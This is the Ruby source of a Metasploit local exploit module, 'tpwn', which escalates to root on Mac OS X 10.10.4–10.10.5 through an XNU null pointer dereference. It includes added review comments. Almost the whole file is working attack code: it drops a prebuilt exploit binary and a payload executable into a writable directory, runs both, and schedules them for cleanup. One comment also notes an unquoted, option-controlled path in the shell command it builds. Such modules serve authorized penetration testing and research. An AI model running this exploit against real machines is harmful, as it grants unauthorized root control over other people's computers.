rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/local/tpwn.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
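# Local privilege-escalation module for the XNU null pointer dereference
# published as "tpwn" (see the 'References' entry below).
#
# What the module does on the target, as visible in this file:
#   * reads the OS version through get_sysinfo and proceeds only for
#     10.10.4 through 10.10.5;
#   * writes two files with random 8-letter names into WritableDir
#     (default /.Trashes): the prebuilt tpwn binary shipped in the framework
#     data directory, and a Mach-O wrapping the selected payload;
#   * marks both executable, runs the first, then runs the second;
#   * registers both files for cleanup.
#
# The two dropped executables and their directory are the on-disk artifacts
# an investigator would look for if cleanup does not complete.
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Registers module metadata and the WritableDir advanced option.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mac OS X "tpwn" Privilege Escalation',
        'Description' => %q{
          This module exploits a null pointer dereference in XNU to escalate
          privileges to root.

          Tested on 10.10.4 and 10.10.5.
        },
        'Author' => [
          'qwertyoruiop', # Vulnerability discovery and PoC
          'wvu' # Copy/paste monkey
        ],
        # NOTE(review): only the PoC repository is referenced; no advisory or
        # vulnerability identifier is listed here, which makes it harder to
        # map this module to a vendor fix — TODO add one if it exists.
        'References' => [
          ['URL', 'https://github.com/kpwn/tpwn']
        ],
        'DisclosureDate' => '2015-08-16',
        'License' => MSF_LICENSE,
        'Platform' => 'osx',
        'Arch' => ARCH_X64,
        'SessionTypes' => ['shell'],
        'Privileged' => true,
        'Targets' => [
          ['Mac OS X 10.10.4-10.10.5', {}]
        ],
        'DefaultTarget' => 0,
        # NOTE(review): all three fields are declared unknown, so the metadata
        # tells an operator nothing about what a run (or a failed run) does to
        # the host. #exploit does write two files to disk, so the side-effects
        # field could at least record that (presumably ARTIFACTS_ON_DISK —
        # confirm), and the stability of a kernel-level bug should be stated
        # once it has been verified.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_advanced_options [
      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
    ]
  end

  # @return [String] the directory both files are written to (WritableDir)
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Version-only check: nothing beyond the reported OS version is examined,
  # which is why the positive result is Appears rather than a stronger code.
  #
  # When the version cannot be read or parsed the result is Unknown. The
  # original passed whatever get_sysinfo returned straight to Rex::Version,
  # so an undetermined version either raised or was compared as if it were a
  # real version and reported as Safe.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    version = tpwn_target_version
    return CheckCode::Unknown if version.nil?

    tpwn_affected?(version) ? CheckCode::Appears : CheckCode::Safe
  end

  # Refuses to run when the session is already root, when #check does not
  # return Appears, or when WritableDir is not writable; otherwise drops and
  # runs the two binaries.
  def exploit
    # fail_with raises, so each guard ends the run.
    fail_with Failure::BadConfig, 'Session already has root privileges' if is_root?

    fail_with Failure::NotVulnerable, 'Target is not vulnerable' if check != CheckCode::Appears

    fail_with Failure::BadConfig, "#{base_dir} is not writable" unless writable? base_dir

    # Each file is registered for cleanup right after it is written, so a
    # failure later in the run still leaves it on the cleanup list.
    print_status("Writing exploit to `#{exploit_file}'")
    write_file(exploit_file, binary_exploit)
    register_file_for_cleanup(exploit_file)

    print_status("Writing payload to `#{payload_file}'")
    write_file(payload_file, binary_payload)
    register_file_for_cleanup(payload_file)

    print_status('Executing exploit...')
    cmd_exec(sploit)
    print_status('Executing payload...')
    cmd_exec(payload_file)
  end

  # @return [Boolean] true when the reported OS version is within
  #   10.10.4..10.10.5; false when it is outside that range or could not be
  #   determined
  def ver?
    version = tpwn_target_version
    !version.nil? && tpwn_affected?(version)
  end

  # Shell command that marks both dropped files executable and then runs the
  # first one.
  #
  # NOTE(review): both paths are interpolated unquoted. The file names are
  # alphabetic, but base_dir comes from the WritableDir option, so a value
  # containing whitespace or shell metacharacters changes the command that is
  # run on the session. Quoting the paths would remove that ambiguity.
  #
  # @return [String]
  def sploit
    "chmod +x #{exploit_file} #{payload_file} && #{exploit_file}"
  end

  # @return [String] contents of the prebuilt binary at
  #   <data directory>/exploits/tpwn/tpwn on the framework host
  def binary_exploit
    local_path = File.join(Msf::Config.data_directory, 'exploits', 'tpwn', 'tpwn')
    File.read(local_path)
  end

  # @return [String] the encoded payload wrapped as an x64 Mach-O executable
  def binary_payload
    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
  end

  # Memoized so the path printed, written, registered for cleanup and executed
  # is the same one.
  #
  # @return [String] random 8-letter file name under base_dir
  def exploit_file
    @exploit_file ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
  end

  # Memoized for the same reason as #exploit_file.
  #
  # @return [String] random 8-letter file name under base_dir
  def payload_file
    @payload_file ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
  end

  private

  # Reads ProductVersion from get_sysinfo and parses it.
  #
  # @return [Rex::Version, nil] nil when the value is missing, blank or not a
  #   parsable version string
  def tpwn_target_version
    sysinfo = get_sysinfo
    raw = sysinfo && sysinfo['ProductVersion']
    return nil if raw.to_s.strip.empty?

    Rex::Version.new(raw)
  rescue ArgumentError
    # presumably what the version parser raises for a malformed string — confirm
    nil
  end

  # @param version [Rex::Version]
  # @return [Boolean] true when version lies in 10.10.4..10.10.5 inclusive
  def tpwn_affected?(version)
    version.between?(Rex::Version.new('10.10.4'), Rex::Version.new('10.10.5'))
  end
end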